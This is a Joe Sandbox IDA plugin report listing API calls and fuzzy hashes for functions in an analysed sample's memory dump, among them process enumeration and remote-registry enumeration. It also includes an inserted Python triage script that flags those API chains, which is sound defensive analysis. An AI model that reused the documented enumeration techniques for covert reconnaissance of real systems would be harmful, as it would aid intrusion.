                                        • Instruction ID: 1e61e511d28d83abee95c01b354212598fbbf4993d92ba14bed513573dc96924
                                        • Opcode Fuzzy Hash: fa555111e7037f6389c82eea37afd50463ed968b4905f28931ec0a5e49ee46d9
                                        • Instruction Fuzzy Hash: 67B18C39A40249DBDF11CFA9C4807EDB7B1FF08710F14952AEC59EB250EB38AA40CB64
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction ID: 9e427d89476377a4cd828ff31cb37a0d22b4d2068d115b2475fc6599520252e7
                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction Fuzzy Hash: 3461A03051024AEBCF05EF60CC89FFE37A9AF05354F048454FA695B292DB789D05CB51
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 007D1B09
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007D1B17
                                        • __wsplitpath.LIBCMT ref: 007D1B45
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcscat.LIBCMT ref: 007D1B5A
                                        • Process32NextW.KERNEL32(00000000,?), ref: 007D1BD0
                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007D1BE2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID:
                                        • API String ID: 1380811348-0
                                        • Opcode ID: 5f7010dbdc4ce3c82f01d701b84aeed773dc5128131abe9a36a06783e0e93843
                                        • Instruction ID: 0b0d1f5839c730ca44cf1072e6f8675251b87a79062bdb64fe190b2dff1ab274
                                        • Opcode Fuzzy Hash: 5f7010dbdc4ce3c82f01d701b84aeed773dc5128131abe9a36a06783e0e93843
                                        • Instruction Fuzzy Hash: D2518371504305AFD720EF24C889EABB7ECEF88754F40491EF58997251EB74EA05CBA2
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2FA0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2FE0
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D3003
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D302C
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D306F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D307C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: 677a347e6c8c4fe7ca9251c78334f4928ade1e5a157eb116d7269311aaf68032
                                        • Instruction ID: 3898ba438a7edb4d2b9965540d7ee0b142e9816ed9e8f9de9548e714b109f36d
                                        • Opcode Fuzzy Hash: 677a347e6c8c4fe7ca9251c78334f4928ade1e5a157eb116d7269311aaf68032
                                        • Instruction Fuzzy Hash: 0C516A71108204EFC715EF64C889E6AB7F9BF88304F04891EF585872A1DB79EA15CB52
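The two entries above, the Toolhelp32 process walk (CreateToolhelp32Snapshot, Process32FirstW, Process32NextW) and the RegConnectRegistryW / RegOpenKeyExW / RegEnumValueW chain, are the kind of API sequences an analyst pulls out of a listing like this first. The script below is an added example by the editor, not part of the Joe Sandbox report or its IDA plugin: it parses the report's own "APIs" and "Similarity" lines (a sample excerpted from this page is embedded inline) into one record per function, keeps "Part of subcall function" lines separate from the function's direct calls, and flags entries whose direct calls contain every API of a rule set. The two rule sets, their labels and the all-APIs-present matching threshold are the editor's assumptions, not sandbox signatures.

```python
"""Parse the per-function "APIs" / "Similarity" entries of a Joe Sandbox listing and
flag API chains worth a second look. Editor's added example, not Joe Sandbox code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: three entries excerpted from this report (Toolhelp32 process
# walk, remote-registry enumeration, and an entry whose "APIs" section is empty).
SAMPLE_REPORT = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007D1B09
• Process32FirstW.KERNEL32(00000000,?), ref: 007D1B17
• __wsplitpath.LIBCMT ref: 007D1B45
  • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
• Process32NextW.KERNEL32(00000000,?), ref: 007D1BD0
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007D1BE2
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• Instruction Fuzzy Hash: D2518371504305AFD720EF24C889EABB7ECEF88754F40491EF58997251EB74EA05CBA2
APIs
  • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
  • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2FA0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2FE0
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D302C
• RegCloseKey.ADVAPI32(00000000), ref: 007D307C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• Instruction Fuzzy Hash: 0C516A71108204EFC715EF64C889E6AB7F9BF88304F04891EF585872A1DB79EA15CB52
APIs
Similarity
• API ID: _wcscpy$_wcscat
• Instruction Fuzzy Hash: C351D070A40215EECF21BF99D4459BDB7B1EF08320F50804AF540AB2D2DBBC9E52D7A0
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the plugin's
# "Part of subcall function XXXX:" marker for activity inside a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
META_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")  # "• Key: value"


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                       # call-site address in the dump
    subcall_of: str | None = None  # parent function address for "Part of subcall" lines


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> set[str]:
        """APIs the function calls itself; subcall lines belong to callees."""
        return {c.name for c in self.calls if c.subcall_of is None}


def parse_report(text: str) -> list[FunctionEntry]:
    """Split the listing at each "APIs" header; collect its calls and "Key: value" lines."""
    entries: list[FunctionEntry] = []
    current = FunctionEntry()  # sink for anything before the first "APIs" header
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(current := FunctionEntry())
        elif m := API_LINE.match(line):
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["parent"]))
        elif m := META_LINE.match(line):
            current.meta[m["key"]] = m["value"]
    return entries


# Editor's triage rules (assumed): a rule fires only when every API in its set is a
# direct call of the function, so a lone CloseHandle or RegCloseKey never triggers.
BEHAVIOUR_RULES: dict[str, frozenset[str]] = {
    "process enumeration via Toolhelp32 snapshot":
        frozenset({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    "registry value enumeration via RegConnectRegistry":
        frozenset({"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"}),
}


def classify(entry: FunctionEntry) -> list[str]:
    apis = entry.direct_apis()
    return [label for label, needed in BEHAVIOUR_RULES.items() if needed <= apis]


def triage(text: str) -> list[tuple[str, list[str]]]:
    """(address of the first direct call, matched labels) for every flagged entry."""
    flagged = []
    for entry in parse_report(text):
        if labels := classify(entry):
            first = next(c.ref for c in entry.calls if c.subcall_of is None)
            flagged.append((first, labels))
    return flagged
```

Running `triage(SAMPLE_REPORT)` returns the two flagged functions keyed by the address of their first direct call (007D1B09 and 007D2FA0 in the sample). Entries whose "APIs" section is empty, as several on this page are, parse to zero calls and match nothing; the "Instruction Fuzzy Hash" and "API ID" values land in `meta`, so the same records can be joined to other reports on those keys.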
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction ID: ddcfcf045b38ce32d4b99a4482c4ddb45b578cca5cc95f9d0a3aa113e5e01d76
                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                        • Instruction Fuzzy Hash: C351D070A40215EECF21BF99D4459BDB7B1EF08320F50804AF540AB2D2DBBC9E52D7A0
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007B2AF6
                                        • VariantClear.OLEAUT32(00000013), ref: 007B2B68
                                        • VariantClear.OLEAUT32(00000000), ref: 007B2BC3
                                        • _memmove.LIBCMT ref: 007B2BED
                                        • VariantClear.OLEAUT32(?), ref: 007B2C3A
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007B2C68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                        • String ID:
                                        • API String ID: 1101466143-0
                                        • Opcode ID: 02979575eb77c9f6d6443542b178eeb4a00bc1ae4c46acf76ca2d9fd19a8b3fd
                                        • Instruction ID: 8dbc1c463b7d6e131d5866d6dab3d429fe499a14087d7e8578c1891af50f3981
                                        • Opcode Fuzzy Hash: 02979575eb77c9f6d6443542b178eeb4a00bc1ae4c46acf76ca2d9fd19a8b3fd
                                        • Instruction Fuzzy Hash: 44517CB5A00209EFCB24CF58C884AAAB7B9FF4C314B158559ED59DB311E734E952CFA0
                                        APIs
                                        • GetMenu.USER32(?), ref: 007D833D
                                        • GetMenuItemCount.USER32(00000000), ref: 007D8374
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D839C
                                        • GetMenuItemID.USER32(?,?), ref: 007D840B
                                        • GetSubMenu.USER32(?,?), ref: 007D8419
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D846A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountMessagePostString
                                        • String ID:
                                        • API String ID: 650687236-0
                                        • Opcode ID: ea9a8d5edbb88bf18c75b1520d7736135a6197674b856f8b4b48d72c57694c2c
                                        • Instruction ID: 5e1c6ed8ea6a98f7d134fc3257ce33ab2ea145ced363d62fd003a44977951dd8
                                        • Opcode Fuzzy Hash: ea9a8d5edbb88bf18c75b1520d7736135a6197674b856f8b4b48d72c57694c2c
                                        • Instruction Fuzzy Hash: A951CE31A00215EFCF50EFA8C845AAEB7F4EF48710F10845AE905BB351CB38AE01CB91
                                        APIs
                                        • _memset.LIBCMT ref: 007B552E
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B5579
                                        • IsMenu.USER32(00000000), ref: 007B5599
                                        • CreatePopupMenu.USER32 ref: 007B55CD
                                        • GetMenuItemCount.USER32(000000FF), ref: 007B562B
                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B565C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: 00e0196fa5192a9d207df51112bf2bc44d936af15dd760680741b69a62f11b3a
                                        • Instruction ID: 28014a1ee3babd904fcc2b1651a2c8dee8a850aa5054552ef9dca560c16af0ec
                                        • Opcode Fuzzy Hash: 00e0196fa5192a9d207df51112bf2bc44d936af15dd760680741b69a62f11b3a
                                        • Instruction Fuzzy Hash: 4351F270A00B49EFDF21CF68D888BEDBBF6AF05718F544119E8159B290E3B89D44CB51
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 0078B1C1
                                        • GetWindowRect.USER32(?,?), ref: 0078B225
                                        • ScreenToClient.USER32(?,?), ref: 0078B242
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0078B253
                                        • EndPaint.USER32(?,?), ref: 0078B29D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                        • String ID:
                                        • API String ID: 1827037458-0
                                        • Opcode ID: 5fd5100b9d2560d1ae8555f7ab577fe1979d59503dd60fd3165231b164eba4a2
                                        • Instruction ID: e2b4eb170a4112474a5993f827b50163e57d03941d752c0dcc3cd7775165799f
                                        • Opcode Fuzzy Hash: 5fd5100b9d2560d1ae8555f7ab577fe1979d59503dd60fd3165231b164eba4a2
                                        • Instruction Fuzzy Hash: 5841AD70100200EFCB21EF25DC88FBA7BE8FB59760F040A69F9A5872A1C7389C45DB65
                                        APIs
                                        • ShowWindow.USER32(00831810,00000000,?,?,00831810,00831810,?,007EE2D6), ref: 007DE21B
                                        • EnableWindow.USER32(?,00000000), ref: 007DE23F
                                        • ShowWindow.USER32(00831810,00000000,?,?,00831810,00831810,?,007EE2D6), ref: 007DE29F
                                        • ShowWindow.USER32(?,00000004,?,?,00831810,00831810,?,007EE2D6), ref: 007DE2B1
                                        • EnableWindow.USER32(?,00000001), ref: 007DE2D5
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DE2F8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 7dcd516c17c1a55cbf45ed88c57a940c6623437669cb895008ecbabfed1d10f6
                                        • Instruction ID: 2e401cd318cfea0d327e7b17aa5fba3c87e6c831c83609c575ee9eef014a85f2
                                        • Opcode Fuzzy Hash: 7dcd516c17c1a55cbf45ed88c57a940c6623437669cb895008ecbabfed1d10f6
                                        • Instruction Fuzzy Hash: A3415035600941EFDB26DF14C899BA47BF5BB06314F1C81BAEA588F3A2C775B841CB91
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                        • _wcstok.LIBCMT ref: 007C1D6E
                                        • _wcscpy.LIBCMT ref: 007C1DFD
                                        • _memset.LIBCMT ref: 007C1E30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                        • String ID: X
                                        • API String ID: 774024439-3081909835
                                        • Opcode ID: aa0245dc079ef96cd7e19a790cfdcb308a0a47e05c97cbc5421516ded0fde9d2
                                        • Instruction ID: 9d632ccb342f558f858d6cfec1a1c1647a573ef1160248e262ba72af2c209564
                                        • Opcode Fuzzy Hash: aa0245dc079ef96cd7e19a790cfdcb308a0a47e05c97cbc5421516ded0fde9d2
                                        • Instruction Fuzzy Hash: D9C17231608341DFC724EF24C899E5AB7E4BF85350F40892DF899972A2DB78ED45CB92
                                        APIs
                                          • Part of subcall function 0078B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                          • Part of subcall function 0078B58B: BeginPath.GDI32(?), ref: 0078B611
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DE9F2
                                        • LineTo.GDI32(00000000,00000003,?), ref: 007DEA06
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DEA14
                                        • LineTo.GDI32(00000000,00000000,?), ref: 007DEA24
                                        • EndPath.GDI32(00000000), ref: 007DEA34
                                        • StrokePath.GDI32(00000000), ref: 007DEA44
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 007AEFB6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 007AEFC7
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007AEFCE
                                        • ReleaseDC.USER32(00000000,00000000), ref: 007AEFD6
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007AEFED
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 007AEFFF
                                          • Part of subcall function 007AA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,007AA79D,00000000,00000000,?,007AAB73), ref: 007AB2CA
                                        Similarity
                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                        • String ID:
                                        • API String ID: 603618608-0
                                        APIs
                                        • __init_pointers.LIBCMT ref: 007987D7
                                          • Part of subcall function 00791E5A: __initp_misc_winsig.LIBCMT ref: 00791E7E
                                          • Part of subcall function 00791E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00798BE1
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00798BF5
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00798C08
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00798C1B
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00798C2E
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00798C41
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00798C54
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00798C67
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00798C7A
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00798C8D
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00798CA0
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00798CB3
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00798CC6
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00798CD9
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00798CEC
                                          • Part of subcall function 00791E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00798CFF
                                        • __mtinitlocks.LIBCMT ref: 007987DC
